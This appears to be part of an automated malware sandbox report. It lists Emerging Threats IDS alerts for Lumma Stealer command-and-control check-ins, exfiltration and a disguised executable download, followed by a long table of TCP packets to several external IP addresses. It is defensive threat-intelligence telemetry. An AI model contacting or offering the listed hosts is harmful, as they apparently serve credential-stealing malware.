2024-12-27T20:24:37.000398+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49744	104.21.89.250	443	TCP
2024-12-27T20:24:37.000398+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49744	104.21.89.250	443	TCP
2024-12-27T20:24:38.320448+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49750	104.21.89.250	443	TCP
2024-12-27T20:24:39.151502+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49750	104.21.89.250	443	TCP
2024-12-27T20:24:39.151502+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49750	104.21.89.250	443	TCP
2024-12-27T20:24:41.100799+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49756	104.21.89.250	443	TCP
2024-12-27T20:24:44.260408+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49763	104.21.89.250	443	TCP
2024-12-27T20:24:46.485474+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49769	104.21.89.250	443	TCP
2024-12-27T20:24:49.206242+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49777	104.21.89.250	443	TCP
2024-12-27T20:24:51.308770+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49782	104.21.89.250	443	TCP
2024-12-27T20:24:53.591356+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49788	104.21.89.250	443	TCP
2024-12-27T20:24:53.595116+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	49788	104.21.89.250	443	TCP
2024-12-27T20:24:57.220753+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49798	104.21.89.250	443	TCP
2024-12-27T20:24:58.003960+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49798	104.21.89.250	443	TCP
2024-12-27T20:24:59.547532+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49803	185.161.251.21	443	TCP
2024-12-27T20:25:01.484303+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49810	104.21.37.128	443	TCP
2024-12-27T20:25:02.379126+0100	2008438	ET MALWARE Possible Windows executable sent when remote host claims to send a Text File	1	104.21.37.128	443	192.168.2.5	49810	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2024 20:24:34.902561903 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:34.902602911 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:34.902721882 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:34.903837919 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:34.903851986 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:36.226284981 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:36.226361990 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:36.229346991 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:36.229352951 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:36.229675055 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:36.268342018 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:36.268367052 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:36.268759966 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:37.000510931 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:37.000756979 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:37.000823975 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:37.002859116 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:37.002870083 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:37.002882004 CET	49744	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:37.002886057 CET	443	49744	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:37.008959055 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:37.008990049 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:37.009071112 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:37.009301901 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:37.009315014 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:38.320353985 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:38.320447922 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:38.321438074 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:38.321453094 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:38.321774006 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:38.322835922 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:38.322854042 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:38.322911024 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.151582003 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.151784897 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.151868105 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.151874065 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.151902914 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.152023077 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.152030945 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.159496069 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.159552097 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.159557104 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.174902916 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.174973965 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.174978971 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.215847969 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.215856075 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.262696028 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.270695925 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.325205088 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.325215101 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.362711906 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.362778902 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.362792969 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.374212027 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.374284983 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.374293089 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.374568939 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.374634027 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.374697924 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.374711037 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.374720097 CET	49750	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.374726057 CET	443	49750	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.854578972 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.854628086 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:39.854710102 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.855062962 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:39.855074883 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:41.100723028 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:41.100799084 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:41.101965904 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:41.101973057 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:41.102297068 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:41.103450060 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:41.103558064 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:41.103593111 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:42.977236986 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:42.977355003 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:42.977402925 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:42.977514982 CET	49756	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:42.977534056 CET	443	49756	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:42.993557930 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:42.993590117 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:42.993669033 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:42.993908882 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:42.993922949 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:44.260304928 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:44.260407925 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:44.261506081 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:44.261519909 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:44.261857033 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:44.266235113 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:44.266371965 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:44.266397953 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:44.266463041 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:44.307358980 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:45.091854095 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:45.092122078 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:45.092178106 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:45.092422962 CET	49763	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:45.092443943 CET	443	49763	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:45.172652960 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:45.172691107 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:45.172764063 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:45.173053026 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:45.173065901 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:46.485357046 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:46.485474110 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:46.486772060 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:46.486809015 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:46.487787008 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:46.488799095 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:46.488948107 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:46.489008904 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:46.489104033 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:46.489120007 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:47.779810905 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:47.780113935 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:47.780210018 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:47.780369997 CET	49769	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:47.780389071 CET	443	49769	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:47.985981941 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:47.986016989 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:47.986078978 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:47.986334085 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:47.986349106 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:49.206154108 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:49.206242085 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:49.207328081 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:49.207338095 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:49.208288908 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:49.209359884 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:49.209460020 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:49.209541082 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:50.073178053 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:50.073399067 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:50.073560953 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:50.073560953 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:50.086292028 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:50.086354971 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:50.086440086 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:50.086709023 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:50.086740971 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:50.387762070 CET	49777	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:50.387779951 CET	443	49777	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:51.308645010 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:51.308769941 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:51.309937000 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:51.309969902 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:51.310802937 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:51.311837912 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:51.317082882 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:51.317095995 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:52.079523087 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:52.079791069 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:52.079868078 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:52.079957008 CET	49782	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:52.079993963 CET	443	49782	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:52.370784998 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:52.370812893 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:52.371764898 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:52.372035027 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:52.372046947 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.591274977 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.591356039 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.592400074 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.592415094 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.592900991 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.593983889 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.594626904 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.594671011 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.594794035 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.594830990 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.594953060 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.594985962 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.595127106 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.595153093 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.595304966 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.595333099 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.595496893 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.595535994 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.595546007 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.595704079 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.595733881 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.639339924 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.639555931 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.639611959 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.639627934 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.687335014 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.687561989 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.687623024 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.687645912 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.731375933 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.731528997 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:53.775326967 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:53.958164930 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:55.951075077 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:55.951189995 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:55.951276064 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:55.951386929 CET	49788	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:55.951406002 CET	443	49788	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:55.954432964 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:55.954458952 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:55.954616070 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:55.954898119 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:55.954911947 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:57.220663071 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:57.220752954 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:57.221832991 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:57.221844912 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:57.222333908 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:57.223448038 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:57.223474026 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:57.223539114 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:58.004034996 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:58.004302979 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:58.004371881 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:58.004487991 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:58.004507065 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:58.004517078 CET	49798	443	192.168.2.5	104.21.89.250
Dec 27, 2024 20:24:58.004522085 CET	443	49798	104.21.89.250	192.168.2.5
Dec 27, 2024 20:24:58.145529985 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:24:58.145580053 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:24:58.145651102 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:24:58.146219015 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:24:58.146234989 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:24:59.547446966 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:24:59.547532082 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:24:59.548871994 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:24:59.548883915 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:24:59.549381971 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:24:59.550903082 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:24:59.591358900 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:25:00.057648897 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:25:00.057720900 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:25:00.057777882 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:25:00.057928085 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:25:00.057951927 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:25:00.057962894 CET	49803	443	192.168.2.5	185.161.251.21
Dec 27, 2024 20:25:00.057967901 CET	443	49803	185.161.251.21	192.168.2.5
Dec 27, 2024 20:25:00.212079048 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:00.212130070 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:00.212193966 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:00.212583065 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:00.212596893 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:01.484225988 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:01.484302998 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:01.485971928 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:01.485979080 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:01.486202002 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:01.487529039 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:01.531339884 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.098849058 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.098898888 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.098932028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.098974943 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.098988056 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.099045038 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.099117994 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.099191904 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.099311113 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.099320889 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.110316038 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.110380888 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.110388041 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.118740082 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.118798018 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.118803024 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.169074059 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.218650103 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.262986898 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.263000011 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.303792000 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.303915977 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.303926945 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.310410023 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.310494900 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.310591936 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.310599089 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.310691118 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.318665028 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.327018976 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.327109098 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.327115059 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.335021973 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.335211992 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.335217953 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.343178034 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.343251944 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.343257904 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.351366997 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.351457119 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.351463079 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.359621048 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.359685898 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.359692097 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.366170883 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.366228104 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.366234064 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.372525930 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.372632027 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.372637987 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.385447979 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.385600090 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.391068935 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.391073942 CET	443	49810	104.21.37.128	192.168.2.5
Dec 27, 2024 20:25:02.398888111 CET	49810	443	192.168.2.5	104.21.37.128
Dec 27, 2024 20:25:02.419642925 CET	443	49810	104.21.37.128	192.168.2.5
